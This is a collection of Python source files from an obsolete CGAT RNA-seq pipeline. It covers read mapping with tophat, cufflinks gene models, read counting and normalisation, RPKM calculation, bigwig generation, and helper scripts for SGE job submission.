@files( [ (x, "%s_%03i_na.mali" % (x[:-3],f), f)
for x,f in itertools.product( glob.glob("*.fa"), (0, 80 ) ) ] )
def alignToProfile( infile, outfile, threshold ):
_alignToProfile( infile, outfile, min_score = threshold )
@transform( alignToProfile
, suffix( ".mali")
, ".import" )
def importMaliStats( infile, outfile ):
'''import stats.'''
table = P.toTable( outfile ) + "_info"
statement = '''
python %(scriptsdir)s/csv2db.py %(csv2db_options)s
--index=read_id
--table=%(table)s
< %(infile)s.info
> %(outfile)s
'''
P.run()
@transform( alignToProfile
, suffix( "_na.mali")
, "_aa.mali" )
def buildMalisCodon( infile, outfile ):
'''build codon alignments
The frame is given by the master multiple alignment.
Sequences with indels that are not multiples of three
are removed.
Sequences with stop codons are removed.
TODO
'''
statement = '''
cat %(infile)s
| python %(scriptsdir)s/fasta2fasta.py --method=translate
| perl -p -e "s/[a-z]/-/g unless (/^>/)"
| python %(scriptsdir)s/mali2mali.py --method=remove-all-gaps --log=%(outfile)s.log --allow-duplicates
> %(outfile)s
'''
P.run()
@transform( alignToProfile
, suffix( "_na.mali")
, "_aa.mali" )
def buildMalisAA( infile, outfile ):
'''translate multiple alignments.
The frame is given by the master multiple alignment.
Indels in other sequences are ignored.
'''
statement = '''
cat %(infile)s
| perl -p -e "s/[a-z]/-/g unless (/^>/)"
| python %(scriptsdir)s/mali2mali.py --method=remove-all-gaps --log=%(outfile)s.log --allow-duplicates
| python %(scriptsdir)s/fasta2fasta.py --method=translate
> %(outfile)s
'''
P.run()
@transform( alignToProfile
, suffix( "_na.mali")
, "_na.columns" )
def computeColumnStatsNA( infile, outfile ):
'''compute stats per column.
Only columns are counted that are non-insert with respect to
the master alignment. The master alignment columns are
later removed in order to count only sequences within
a strain.
'''
statement = '''
cat %(infile)s
| perl -p -e "s/[a-z]/-/g unless (/^>/)"
| python %(scriptsdir)s/mali2mali.py --method=remove-all-gaps --log=%(outfile)s.log --allow-duplicates
| python %(scriptsdir)s/fasta2fasta.py --exclude="(^mouse)" --log=%(outfile)s.log
| python %(scriptsdir)s/mali2table.py --section=all --log=%(outfile)s.log --allow-duplicates
> %(outfile)s
'''
P.run()
@transform( buildMalisAA
, suffix( "_aa.mali")
, "_aa.columns" )
def computeColumnStatsAA( infile, outfile ):
'''compute stats per column.
Only columns are counted that are non-insert with respect to
the master alignment. The master alignment columns are
later removed.
'''
statement = '''
cat %(infile)s
| perl -p -e "s/[X?]/-/g unless (/^>/)"
| python %(scriptsdir)s/fasta2fasta.py --exclude="(^mouse)" --log=%(outfile)s.log
| python %(scriptsdir)s/mali2table.py --section=all --log=%(outfile)s.log --allow-duplicates --alphabet=aa
> %(outfile)s
'''
P.run()
@transform( (computeColumnStatsNA, computeColumnStatsAA)
, suffix( ".columns")
, "_columns.import" )
def importColumnStats( infile, outfile ):
'''import stats.'''
table = P.toTable( outfile )
statement = '''
python %(scriptsdir)s/csv2db.py %(csv2db_options)s
--index=column
--table=%(table)s
< %(infile)s
> %(outfile)s
'''
P.run()
@follows( alignToProfile
, importMaliStats
, computeColumnStatsNA
, buildMalisAA
, computeColumnStatsAA
, importColumnStats
)
def full(): pass
if __name__== "__main__":
sys.exit( P.main(sys.argv) )
```
#### File: obsolete/pipeline_rmaa/basic_headers.py
```python
from subprocess import Popen, PIPE
import os
from time import sleep
import commands
def run_cmd(my_cmd):
p=Popen(my_cmd, shell=True, stdin = PIPE, stderr = PIPE)
p.stdin.close()
output=p.stderr.read()
sts = os.waitpid(p.pid, 0)
if 'error' in output:
print "could not contact SGE, retrying resubmission in 5 seconds"
print my_cmd
sleep(5)
run_cmd(my_cmd)
return
def run_cmd_output(my_cmd):
p=Popen(my_cmd, shell=True, stdin = PIPE, stdout = PIPE, stderr = PIPE)
p.stdin.close()
output=p.stdout.read()
eout=p.stderr.read()
sts = os.waitpid(p.pid, 0)
if 'error' in eout:
print "could not contact SGE, retrying resubmission in 5 seconds"
print my_cmd
sleep(5)
output=run_cmd_output(my_cmd)
return output
def run_cmd_qsub(my_cmd):
while True:
sleep(5)
if 'has been submitted' in commands.getoutput(my_cmd):
break
return
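# --- editor sketch: possible usage of the helpers above (not part of the original
# module; the command strings and qsub options are hypothetical placeholders) ---
#
# run_cmd("ls -l > file_list.txt") # fire-and-forget; retries if SGE reports an error
# listing = run_cmd_output("qstat -u $USER") # capture stdout; retries on SGE errors
# run_cmd_qsub("qsub -cwd -b y ./align.sh") # poll until SGE confirms the submission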
```
#### File: obsolete/pipeline_rmaa/build_adjusted_counts.py
```python
import sys, optparse, re, os
import numpy
import Experiment as E
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv: argv = sys.argv
# setup command line parser
parser = optparse.OptionParser( version = "%prog version: $Id: script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage = globals()["__doc__"] )
(options, args) = E.Start( parser, argv = argv )
ratios_file=open(args[0],'w')
samples=args[1:]
# first read in all values
gene_dict={}
for sample in samples:
numgenes=0
gene_dict[sample]=[]
other_gene_info=[]
for line in open(sample,'r'):
if line.startswith("#"): continue
if line.startswith("gene_id"): continue
la=line.rstrip('\n').split('\t')
if not len(la)==3: # for example, when qsub spits something dumb out
continue
other_gene_info.append((la[0],la[2]))
gene_dict[sample].append(int(la[1]))
numgenes+=1
# then sum all samples and calculate ratios
ratio_dict={}
for sample in samples: # initialize ratios dicts
ratio_dict[sample]=[]
for gene_idx in range(numgenes):
totreads=0
for sample in samples:
totreads+=gene_dict[sample][gene_idx]
for sample in samples:
if totreads==0: continue
ratio=gene_dict[sample][gene_idx]/float(totreads)
ratio_dict[sample].append(ratio)
# find median ratio for each and print the header
med_ratio=[]
my_str="gene_id\tlength\t"
my_str2=""
for sample in samples:
my_str+=sample.rsplit('/',1)[1].split('.')[0]+'\t'
my_str2 += sample.rsplit('/',1)[1].split('.')[0] + '\t'
ratio_dict[sample].sort()
med = float(numpy.median(ratio_dict[sample]))
if med == 0.0:
E.warn( "median ratio is 0 in %s - added small amount" % sample )
med += 0.00001
med_ratio.append( med )
print my_str.rstrip('\t')
ratios_file.write( my_str2.rstrip('\t') + '\n' )
smallest_ratio=min(med_ratio)
my_str2=""
for index, sample in enumerate(samples):
try:
my_str2 += str( smallest_ratio/med_ratio[index] ) + '\t'
except ZeroDivisionError:
my_str2 += 'na\t'
ratios_file.write( my_str2.rstrip('\t') )
# identify the smallest median ratio; correct all counts and prints out data from all samples...
for gene_idx in range(numgenes):
my_str=other_gene_info[gene_idx][0]+'\t'+other_gene_info[gene_idx][1]+'\t'
for index, sample in enumerate(samples):
try:
my_str+=str(gene_dict[sample][gene_idx]*smallest_ratio/med_ratio[index]) + '\t'
except ZeroDivisionError:
my_str += 'na\t'
print my_str.rstrip('\t')
"""
files=[]
for index, sample in samples:
files.append(open(sample,'r'))
for line in file[0]:
la=line.rstrip('\n').split('\t')
gene_name=la[0]
my_str=gene_name + '\t' + str( float(la[1])*smallest_ratio/med_ratio[0] )
for each in files[1::]:
each.readline()
output.write(my_str)
"""
E.Stop()
if __name__ == "__main__":
sys.exit( main( sys.argv) )
```
#### File: obsolete/pipeline_rmaa/count_reads_in_genes.py
```python
import sys, optparse, itertools
import pysam
import Bed, IOTools
import Experiment as E
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv: argv = sys.argv
# setup command line parser
parser = optparse.OptionParser( version = "%prog version: $Id: script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage = globals()["__doc__"] )
## add common options (-h/--help, ...) and parse command line
(options, args) = E.Start( parser, argv = argv )
coords_file=args[0]
bamfile=pysam.Samfile( args[1], 'rb' ) # bamfile
options.stdout.write( "gene_id\tcounts\tlength\n" )
iter = Bed.iterator( IOTools.openFile( coords_file ) )
for gene_id, exons in itertools.groupby( iter, lambda x: x.name ):
num_reads=0
anames=set([])
lgene = 0
for bed in exons:
lgene += bed.end - bed.start
for alignedread in bamfile.fetch(bed.contig, bed.start, bed.end):
anames.add((alignedread.qname, alignedread.is_read1))
num_reads = len(anames)
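# editor note: counting the set of (read name, first-in-pair flag) pairs means each
# mate contributes at most once per gene, even if it overlaps several exons and is
# therefore returned by more than one fetch() call above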
options.stdout.write( "\t".join( (gene_id,
str(num_reads),
str(lgene ) )) + "\n" )
## write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit( main( sys.argv) )
```
#### File: obsolete/pipeline_rmaa/make_intervals.py
```python
import interval
import sys
from sys import argv
from commands import getstatusoutput
ens_gtf_name = argv[1]
cuff_name = argv[2]
ens_gtf = open(ens_gtf_name,'r')
cuff = open(cuff_name,'r')
# get all chrom names
(status, output) = getstatusoutput("cat %s | awk '{ print $1 }' | sort | uniq" % ens_gtf_name )
if not status == 0:
print "ERROR, CANNOT GET CHROM NAMES"
sys.exit(2)
chroms = output.rstrip('\n').split('\n')
# initiate all categories as dictionaries of interval sets (chrom names are keys)
#CDS = pc_exons = cuff_exons = cuff_introns = other_ens = genic = intergenic = dict.fromkeys(chroms, interval.IntervalSet([]))
CDS = dict.fromkeys(chroms, interval()); pc_exons = dict.fromkeys(chroms, interval()); cuff_exons = dict.fromkeys(chroms, interval())
cuff_introns = dict.fromkeys(chroms, interval()); other_ens = dict.fromkeys(chroms, interval()); genic = dict.fromkeys(chroms, interval())
intergenic = dict.fromkeys(chroms, interval()); intronic = dict.fromkeys(chroms, interval())
# CDS: set of all protein-coding sequence
# pc_exons: set of all protein-coding exons (subtract CDS to get UTRs)
# other_ens: other Ensembl annotations
# genic: set of all genic regions - remainder after subtracting all exonic regions are intronic regions
# intronic: intronic regions
# cuff_introns: genic regions (intronic) which are expanded by Cufflinks models
# cuff_exons: genic regions (exonic) which are expanded by Cufflinks models
# intergenic: all intergenic regions
# UTRs: UTRs of pc genes (created later)
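# --- editor sketch: the interval algebra used below, assuming the pyinterval-style
# API imported above (interval[a, b], union with |, intersection with &, .components).
# A toy example with hypothetical coordinates:
# exon_set = interval[10, 20] | interval[30, 40] # union of two exons
# cds_part = interval[15, 35]
# exon_set & cds_part # -> interval([15.0, 20.0], [30.0, 35.0])
# (exon_set & cds_part).components # -> list of the two atomic pieces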
# iterate through the file grabbing CDS, pc sequence, other_ens, genic regions
gene_ids={}
for line in ens_gtf:
la = line.rstrip('\n').split('\t')
if la[1] == "protein_coding":
if la[2] == "CDS":
CDS[ la[0] ] = CDS.get(la[0], interval()) | interval[min( map(int,la[3:5]) ), max( map(int,la[3:5]) )]
else:
pc_exons[ la[0] ] = pc_exons.get(la[0], interval()) | interval[min( map(int,la[3:5]) ), max( map(int,la[3:5]) )]
else:
other_ens[ la[0] ] = other_ens.get(la[0], interval()) | interval[min( map(int,la[3:5]) ), max( map(int,la[3:5]) )]
gene_id = la[8].split('";')[0].split('"')[1]
gene_ids[ gene_id ] = gene_ids.get(gene_id, [la[0],set([])])
gene_ids[ gene_id ][1].add(int(la[3])); gene_ids[ gene_id ][1].add(int(la[4]))
for gene_id, coords in gene_ids.iteritems():
genic[coords[0]] = genic.get(coords[0], interval()) | interval[min(coords[1]),max(coords[1])]
# get all intronic
for chrom in chroms:
# iterate through all intervals in genic[chrom], removing those pieces found in pc_exons and other_ens
for interv in genic.get(chrom, interval()).components:
if len( interv & pc_exons.get(chrom, interval()) ) == 0 and len( interv & other_ens.get(chrom, interval()) ) == 0: # if no overlap at all (if we're good)
intronic[chrom] = intronic.get(chrom, interval()) | genic[chrom]
elif len( interv & pc_exons.get(chrom, interval()) ) == 0 and len( interv & other_ens.get(chrom, interval()) ) > 0: # if only overlaps other_ens
pass # TODO: handle intervals that only overlap other Ensembl annotations
elif len( interv & pc_exons.get(chrom, interval()) ) > 0 and len( interv & other_ens.get(chrom, interval()) ) == 0: # if only overlaps pc_exons
pass # TODO: handle intervals that only overlap protein-coding exons
else: # if overlaps both
pass # NOTE: still updating from here downward
intronic[chrom].difference_update( pc_exons[chrom] )
intronic[chrom].difference_update( other_ens[chrom] )
UTRs = pc_exons
for chrom in chroms:
UTRs[chrom].difference_update( CDS[chrom] )
old_idi_id=""; cuff_coords=interval(); firsttime=True; cuff_present=False
for line in cuff:
la = line.rstrip('\n').split('\t')
idi_id = la[8].split('";')[0].split('"')[1]
if (not firsttime) and (not idi_id == old_idi_id):
old_idi_id = idi_id
if ens_here and cuff_present:
cuff_exons[chrom].update( cuff_coords )
cuff_introns_here = interval.IntervalSet([interval.Interval( cuff_exons[chrom].lower_bound(), cuff_exons[chrom].upper_bound() )])
cuff_introns_here.difference_update( cuff_exons[chrom] )
cuff_introns[chrom].update(cuff_introns_here)
cuff_coords=interval.IntervalSet([])
ens_here = False
cuff_present = False
firsttime = False
chrom = la[0]
if la[1] == "Cufflinks":
cuff_coords.add( interval.Interval(min( map(int,la[3:5]) ), max( map(int,la[3:5]) )) )
cuff_present=True
else:
ens_here = True
if ens_here and cuff_present: # accounting for the final iteration
cuff_exons[chrom].update( cuff_coords )
cuff_introns_here = interval.IntervalSet([interval.Interval( cuff_exons[chrom].lower_bound(), cuff_exons[chrom].upper_bound() )])
cuff_introns_here.difference_update( cuff_exons[chrom] )
cuff_introns[chrom].update(cuff_introns_here)
for chrom in chroms:
cuff_introns[chrom].difference_update(genic[chrom])
cuff_exons[chrom].difference_update(genic[chrom])
# function to return a list of tuples (start, end, category name)
def return_intervals(interv_set, catname):
coords = []
for interv in interv_set:
coords.append( (interv.lower_bound, interv.upper_bound, catname) )
return coords
# CDS
# UTRs
# other_ens
# intronic
# cuff_exons
# cuff_introns
for chrom in chroms:
sorted_coords = []
sorted_coords.extend( return_intervals(CDS[chrom],"CDS") )
sorted_coords.extend( return_intervals(UTRs[chrom],"UTR") )
sorted_coords.extend( return_intervals(other_ens[chrom],"other_ens") )
sorted_coords.extend( return_intervals(intronic[chrom],"intron") )
sorted_coords.extend( return_intervals(cuff_exons[chrom],"cuff_exons") )
sorted_coords.extend( return_intervals(cuff_introns[chrom],"cuff_introns") )
sorted_coords.sort()
for trio in sorted_coords:
print "\t".join([chrom, str(trio[0]), str(trio[1]), trio[2]])
```
#### File: cgat/obsolete/pipeline_rmaa.py
```python
from ruffus import *
import CGAT.Experiment as E
import sys
import os
import re
import shutil
import itertools
import math
import glob
import logging
import time
# for plotting
try:
import matplotlib
import pylab
PLOT = True
except (ImportError, RuntimeError):
PLOT = False
import numpy
# load options from the config file
import CGAT.Pipeline as P
P.getParameters(
["%s/pipeline.ini" % os.path.splitext(__file__)[0],
"../pipeline.ini",
"pipeline.ini" ] )
PARAMS = P.PARAMS
if os.path.exists("conf.py"):
E.info( "reading additional configuration from conf.py" )
execfile("conf.py")
USECLUSTER=True
# there can be several samples per tissue
parameters = ( ["reads/tissue1/sample1.export.gz",
("reads/tissue1/sample1.1.fq.gz",
"reads/tissue1/sample1.2.fq.gz") ],
["reads/tissue2/sample1.export.gz",
("reads/tissue2/sample1.1.fq.gz",
"reads/tissue2/sample1.2.fq.gz") ],
)
@files( [ ( x, ("%s.1.fq.gz" % x[:-len(".export.gz")],
"%s.2.fg.gz" % x[:-len(".export.gz")] ) ) \
for x in glob.glob("reads/*/*.export.gz" ) ] )
def exportToFastQ( infile, outfiles):
"""
Creates fastq files of paired-ended reads from export files.
"""
to_cluster = USECLUSTER
outfile1, outfile2 = outfiles
statement = '''
python %(rmaadir)s/exports_to_fq.py
%(infile)s
%(outfile1)s
%(outfile2)s
%(remove_bases_from_right)i
%(new_quals)s
'''
P.run()
@files( [ ( "%s/*.export.gz" % x, "%s/insert_sizes" % x )
for x in glob.glob("reads/*" ) if os.path.isdir(x) ] )
def estimateInsertSizes( infiles, outfile):
"""
Plots the internal insert size distribution and calculates the average and standard deviation based on the FWHM
"""
infiles = " ".join(infiles)
to_cluster = USECLUSTER
statement = '''
zcat %(infiles)s | python %(rmaadir)s/return_insert_sizes.py > %(outfile)s
'''
P.run()
# required to resolve strange timing issues
# when trying to open the file in the next command
P.touch( outfile )
ins_sizes_array=numpy.array( [map(int, x[:-1].split("\t")) for x in open(outfile, "r")] )
max_freq=ins_sizes_array[:,1].max()
half_max=float(max_freq)/2.0
E.info( "maximum frequency=%i, halfwidth=%i" % (max_freq, half_max))
# get half width coordinates
for bin, value in ins_sizes_array:
if value < half_max: continue
FWHMmin=bin
break
for bin, value in ins_sizes_array[::-1]:
if value < half_max: continue
FWHMmax=bin
break
FWHM=FWHMmax-FWHMmin
std_dev=int(float(FWHM)/2.3548)
ins_size=int(FWHMmin+float(FWHM)/2.0)-PARAMS["remove_bases_from_right"]
E.info( "".join(["For ", infiles, " FWHM is ", str(FWHM), " ranging from ", str(FWHMmin), " to ", str(FWHMmax), ". std dev ",
str(std_dev), " and ins size ", str(ins_size)] ) )
x, y= [], []
for bin,value in ins_sizes_array:
if FWHMmin - 2 * std_dev < bin < FWHMmax + 2 * std_dev:
x.append(bin)
y.append(value)
if PLOT:
pylab.title("Insert size")
pylab.xlabel('inner distance between sequenced ends')
pylab.ylabel('frequency based on unique eland mappings')
pylab.scatter(x,y)
pylab.savefig(outfile + ".png")
fwhm_file=open(outfile + ".txt", 'w')
my_str='%s\t%s\n' % (ins_size, std_dev)
fwhm_file.write(my_str)
fwhm_file.close()
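# --- editor sketch: the constant 2.3548 above is 2*sqrt(2*ln 2), i.e. the FWHM of a
# Gaussian divided by its standard deviation. A small helper (editor addition, not
# used by the pipeline) making that conversion explicit:
def fwhmToSigma( fwhm ):
    '''convert a full width at half maximum to a Gaussian standard deviation.'''
    return float(fwhm) / (2.0 * math.sqrt(2.0 * math.log(2.0)))  # ~ fwhm / 2.3548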
def getInsertSizes( dirname ):
with open( '%s/insert_sizes.txt' % dirname, 'r') as tmp_f:
ins_size, std_dev = map( int, tmp_f.readline().rstrip('\n').split('\t'))
return ins_size, std_dev
@follows( exportToFastQ, estimateInsertSizes, mkdir("logs/juncs"))
@collate( exportToFastQ, regex(r"reads\/(.+)\/(.+)\..\.fq.gz$"), r'reads/\1/\2.junctions' )
def findJunctions(infiles, outfile):
'''map reads using all known junctions in order to identify novel junctions.
The per-sample junction files are concatenated later and the tophat output directories are removed.
'''
ins_size, std_dev = getInsertSizes( os.path.dirname( outfile[:-len(".junctions") ] ) )
nslots = 4
fastq1, fastq2 = infiles[0]
tmpfilename = P.getTempFilename()
if os.path.exists( tmpfilename ):
os.unlink( tmpfilename )
job_options= "-pe dedicated 4-8 -l mem_free=3G -R y"
to_cluster = USECLUSTER
# tophat does a seek operation on the fq files, hence they
# need to unpacked into real files
statement = '''
gunzip < %(fastq1)s > %(tmpfilename)s.1.fq;
gunzip < %(fastq2)s > %(tmpfilename)s.2.fq;
tophat --output-dir %(tmpfilename)s
--butterfly-search
--min-anchor-length 5
--closure-search
--microexon-search
--min-isoform-fraction 0.0
--mate-inner-dist %(ins_size)i
--mate-std-dev %(std_dev)i
--max-intron-length %(max_intron)i
--raw-juncs %(junctions_file)s
-p %(nslots)i
%(bowtiedir)s/%(genome)s
%(tmpfilename)s.1.fq
%(tmpfilename)s.2.fq
>& %(outfile)s.log;
mv %(tmpfilename)s/junctions.bed %(outfile)s >& %(outfile)s.log2;
mv %(tmpfilename)s/logs %(outfile)s.logs >& %(outfile)s.log3;
rm -rf %(tmpfilename)s %(tmpfilename)s.1.fq %(tmpfilename)s.2.fq >& %(outfile)s.log4
'''
P.run()
@merge(findJunctions, "reads/all.junctions")
def combineJunctions(infiles, outfile):
'''collate all junctions found with tophat together.'''
infiles = " ".join(infiles)
statement = '''
cat %(infiles)s
| grep -v description
| python %(rmaadir)s/combine_junctions.py
| sort
| uniq
> %(outfile)s'''
P.run()
@follows( combineJunctions)
@collate( exportToFastQ,
regex(r"reads\/(.+)\/(.+)\..\.fq.gz$"),
r'reads/\1/\2.bam' )
def mapReads(infiles, outfile):
'''map reads using all known junctions and all junctions found before.
This method requires the explicit genome in bowtiedir together with the
samtools index. Using a flattened genome file will not work due to
the limit of a line length of 65536 in samtools.
'''
if not os.path.exists( "%(bowtiedir)s/%(genome)s.fa" % PARAMS ):
raise ValueError( "genome %(bowtiedir)s/%(genome)s.fa does not exist - create with bowtie-inspect first" % PARAMS)
ins_size, std_dev = getInsertSizes( os.path.dirname( outfile[:-len(".bam") ] ) )
nslots = 4
fastq1, fastq2 = infiles[0]
tmpfilename = P.getTempFilename()
if os.path.exists( tmpfilename ):
os.unlink( tmpfilename )
job_options= "-pe dedicated 4-8 -l mem_free=3G -R y"
to_cluster = USECLUSTER
junctions_file = "reads/all.junctions"
# WARNING: contents of tmpfile can get large (20Gb or more)
statement = '''
gunzip < %(fastq1)s > %(tmpfilename)s.1.fq;
gunzip < %(fastq2)s > %(tmpfilename)s.2.fq;
tophat --output-dir %(tmpfilename)s
--min-isoform-fraction 0.0
--mate-inner-dist %(ins_size)i
--mate-std-dev %(std_dev)i
--raw-juncs %(junctions_file)s
-p %(nslots)i
%(bowtiedir)s/%(genome)s
%(tmpfilename)s.1.fq
%(tmpfilename)s.2.fq
>& %(outfile)s.log;
mv %(tmpfilename)s/accepted_hits.bam %(outfile)s 2>> %(outfile)s.log;
rm -rf %(tmpfilename)s 2>> %(outfile)s.log;
rm -f %(tmpfilename)s.1.fq %(tmpfilename)s.2.fq 2>> %(outfile)s.log
'''
P.run()
@follows( mkdir( "mappings" ) )
@collate( mapReads,
regex(r"reads/(.+)/(.+).bam$"),
r'mappings/\1.multi.bam' )
def combineBams(infiles, outfile):
'''collate all resultant bams together and index.
This method assumes that BAM files have been sorted consistently by bowtie.
'''
to_cluster = USECLUSTER
infile = infiles[0]
if len(infiles) > 1:
infiles = " ".join(infiles)
statement = '''samtools merge -h %(infile)s %(outfile)s %(infiles)s >& %(outfile)s.log'''
P.run()
else:
shutil.copyfile( infile, outfile )
# assume that files are sorted
# statement = '''samtools sort %(outfile)s'''
# P.run()
statement = '''samtools index %(outfile)s >& %(outfile)s.log'''
P.run()
@transform(combineBams, suffix(".multi.bam"), ".unique.bam")
def uniquifyBams( infile, outfile ):
'''extract unique hits'''
to_cluster = USECLUSTER
statement = '''python %(rmaadir)s/uniquify_bam.py %(infile)s %(outfile)s'''
P.run()
statement = '''samtools index %(outfile)s'''
P.run()
@transform(combineBams, suffix(".multi.bam"), ".gtf")
def buildGeneModels(infile, outfile):
'''build transcript models - run cufflinks on each region separately'''
to_cluster = USECLUSTER
track = os.path.basename( outfile[:-len(".gtf")] )
ins_size, std_dev = getInsertSizes( "reads/%s" % track )
tmpfilename = P.getTempFilename()
nslots = 4
if os.path.exists( tmpfilename ):
os.unlink( tmpfilename )
infile = os.path.abspath( infile )
outfile = os.path.abspath( outfile )
statement = '''mkdir %(tmpfilename)s;
samtools view %(infile)s | sort -k3,3 -k4,4n 2> %(outfile)s.log1 > %(tmpfilename)s/temp.sam;
cd %(tmpfilename)s;
cufflinks --inner-dist-mean %(ins_size)i
--inner-dist-stddev %(std_dev)i
--label %(track)s
--num-threads %(nslots)i
--min-isoform-fraction %(cuff_min_isoform)f
--pre-mrna-fraction %(cuff_pre_mrna)f
%(tmpfilename)s/temp.sam >& %(outfile)s.log2;
mv transcripts.gtf %(outfile)s >& %(outfile)s.log3;
rm -rf %(tmpfilename)s >& %(outfile)s.log4
'''
P.run()
@follows( mkdir("transcripts") )
@collate( buildGeneModels,
regex(r"mappings/(.+).gtf$"),
'transcripts/summary.txt' )
def compareGeneModels(infiles, outfile):
'''compare transcript models, using a reference GTF'''
to_cluster = USECLUSTER
infiles = " ".join(infiles)
statement = '''
cuffcompare
-o %(outfile)s
-r %(files_gtf)s
-s %(bowtiedir)s/%(genome)s.fa
%(infiles)s >& %(outfile)s.log
'''
P.run()
@follows( mkdir("transcripts"))
@merge( buildGeneModels,
["transcripts/all.shortreads.gtf", "transcripts/all.combined.gtf"] )
def combineGeneModels(infiles, outfiles):
'''combine Cufflinks gene models together, and also combine with the given reference GTF.'''
to_cluster = USECLUSTER
job_options = "-l mem_free=10G"
infiles = " ".join(infiles)
outfile1, outfile2 = outfiles
statement = '''cat %(infiles)s
| awk '$3 == "exon"'
| python %(scriptsdir)s/gtf2gtf.py --merge-genes --log=%(outfile1)s.log
| python %(scriptsdir)s/gtf2gtf.py --renumber-genes="SR%%010i" --log=%(outfile1)s.log
> %(outfile1)s'''
P.run()
statement = '''cat %(infiles)s %(files_gtf)s
| awk '$3 == "exon"'
| python %(scriptsdir)s/gtf2gtf.py --merge-genes --log=%(outfile2)s.log
| python %(scriptsdir)s/gtf2gtf.py --renumber-genes="ALL%%010i" --log=%(outfile2)s.log
> %(outfile2)s'''
P.run()
@transform(uniquifyBams, suffix(".bam"), ".counts")
def countReads(infile, outfile):
'''count reads in Ensembl protein-coding models.'''
to_cluster = USECLUSTER
job_options = "-l mem_free=10G"
statement = '''
python %(rmaadir)s/count_reads_in_genes.py %(files_genes)s %(infile)s > %(outfile)s
'''
P.run()
@follows(combineBams)
@transform(combineBams, suffix(".bam"), ".counts")
def countReadsMulti(infile, outfile):
'''count MULTI reads in Ensembl protein-coding models'''
to_cluster = USECLUSTER
job_options = "-l mem_free=10G"
statement = '''
python %(rmaadir)s/count_reads_in_genes.py %(files_genes)s %(infile)s > %(outfile)s
'''
P.run()
@merge( countReads,
["mappings/unique.counts.all", "mappings/unique.ratios.all"] )
def adjustCounts(infiles, outfiles):
'''normalize raw read counts to adjusted counts'''
to_cluster = USECLUSTER
job_options = "-l mem_free=20G"
infiles = " ".join(infiles)
outfile0, outfile1 = outfiles
statement = '''
python %(rmaadir)s/build_adjusted_counts.py
%(outfile1)s %(infiles)s
> %(outfile0)s'''
P.run()
@merge( countReadsMulti,
["mappings/multi.counts.all", "mappings/multi.ratios.all"] )
def adjustCountsMulti(infiles, outfiles):
'''normalize raw read counts to adjusted counts for MULTI reads'''
to_cluster = USECLUSTER
job_options = "-l mem_free=20G"
infiles = " ".join(infiles)
outfile0, outfile1 = outfiles
statement = '''
python %(rmaadir)s/build_adjusted_counts.py
%(outfile1)s %(infiles)s
> %(outfile0)s'''
P.run()
@follows( mkdir("graphs") )
@transform(adjustCounts, suffix(".counts.all"), ".rpkm.all")
def calculateRPKMs(infiles, outfile):
'''calculate RPKMs from adjusted read counts'''
to_cluster = USECLUSTER
job_options = "-l mem_free=5G"
infile = infiles[0]
statement = '''
python %(rmaadir)s/calculate_rpkms.py %(infile)s
> %(outfile)s
'''
P.run()
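# --- editor sketch: calculate_rpkms.py itself is not shown in this file; the standard
# RPKM definition it is assumed to implement is sketched below (editor addition, not
# used by the pipeline):
def rpkm( reads, gene_length, total_mapped_reads ):
    '''reads per kilobase of gene model per million mapped reads.'''
    return reads * 1.0e9 / (gene_length * total_mapped_reads)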
def generate_calculate_term_params():
for dbname, location in P.asDict("databases").iteritems():
yield [ "mappings/unique.rpkm.all", "mappings/unique.term_patterns.%s" % dbname, location ]
@follows(calculateRPKMs)
@files( generate_calculate_term_params )
def calculateTermPatterns(infile, outfile, params):
'''calculate variation between tissues according to (GO) terms.
Might be buggy
'''
to_cluster = USECLUSTER
job_options = "-l mem_free=5G"
statement = '''
python %(rmaadir)s/sort_patterns_by_rel_std_dev.py
%(infile)s %(params)s %(min_rpkm_term_var)i %(min_genes_term_var)i
> %(outfile)s
'''
P.run()
@follows( mkdir("graphs"))
@transform(adjustCountsMulti, suffix(".counts.all"), ".rpkm.all")
def calculateRPKMsMulti(infiles, outfile):
'''calculate RPKMs from MULTI adjusted read counts'''
to_cluster = USECLUSTER
job_options = "-l mem_free=5G"
infile = infiles[0]
statement = '''
python %(rmaadir)s/calculate_rpkms.py %(infile)s
> %(outfile)s
'''
P.run()
def _makeBigwig( infile, outfile, normfile ):
with open(normfile, "r" ) as f:
headers=f.readline().rstrip('\n').split('\t')
ratios_list=f.readline().rstrip('\n').split('\t')
ratios = dict( zip(headers, ratios_list) )
ratio = float( ratios[ infile.rsplit('/',1)[1].split('.')[0] ] )
to_cluster = USECLUSTER
job_options = "-l mem_free=25G"
outfile2 = outfile.rsplit('.',1)[0] + '.wig'
statement = '''
samtools pileup %(infile)s
| awk '{ print $1 "\\t" $2 "\\t" $4 * %(ratio)f }'
| python %(rmaadir)s/pileup_to_wig.py > %(outfile2)s
'''
P.run()
statement = '''
wigToBigWig %(outfile2)s %(chrom_sizes)s %(outfile)s
'''
P.run()
@follows(adjustCounts, uniquifyBams)
@transform(uniquifyBams, suffix(".bam"), ".bw")
def makeBigwigs(infile, outfile):
'''make normalized bigwigs.'''
return _makeBigwig( infile, outfile, "mappings/unique.ratios.all" )
@follows(adjustCountsMulti, combineBams)
@transform(combineBams, suffix(".bam"), ".bw")
def makeBigwigsMulti(infile, outfile):
'''make NORMALIZED bigwigs for MULTI counts'''
return _makeBigwig( infile, outfile, "mappings/multi.ratios.all" )
@follows(calculateRPKMs, mkdir("trees") )
@files( [ ('mappings/unique.rpkm.all', 'trees/genes.%s.tree' % min_rpkm, min_rpkm) \
for min_rpkm in PARAMS["min_rpkm_tree"] ])
def makeTreesAllGenes(infile, outfile, rpkmfile):
'''build region relatedness trees for all genes'''
to_cluster = USECLUSTER
job_options = "-l mem_free=5G"
statement = '''
python %(rmaadir)s/make_trees_weight_genes.py %(infile)s %(rpkmfile)s %(outfile)s
'''
P.run()
############################################################################
############################################################################
############################################################################
## Clustering
############################################################################
@follows( calculateRPKMs, mkdir("fuzzy_k") )
@files( [ ( "mappings/unique.rpkm.all",
("fuzzy_k/all-%s-%s.cdt" % (x,y),
"fuzzy_k/background-%s-%s" % (x,y) ),
x, y ) \
for x,y in itertools.product( PARAMS["min_rpkm"], PARAMS["min_diff"] ) ] )
def buildCDTFiles( infile, outfiles, min_rpkm, min_diff ):
'''build cdt files for fuzzy k clustering.'''
cdt_filename, background_filename = outfiles
min_diff_threshold = math.log( min_diff, 2)
min_gene_len = PARAMS["min_gene_len"]
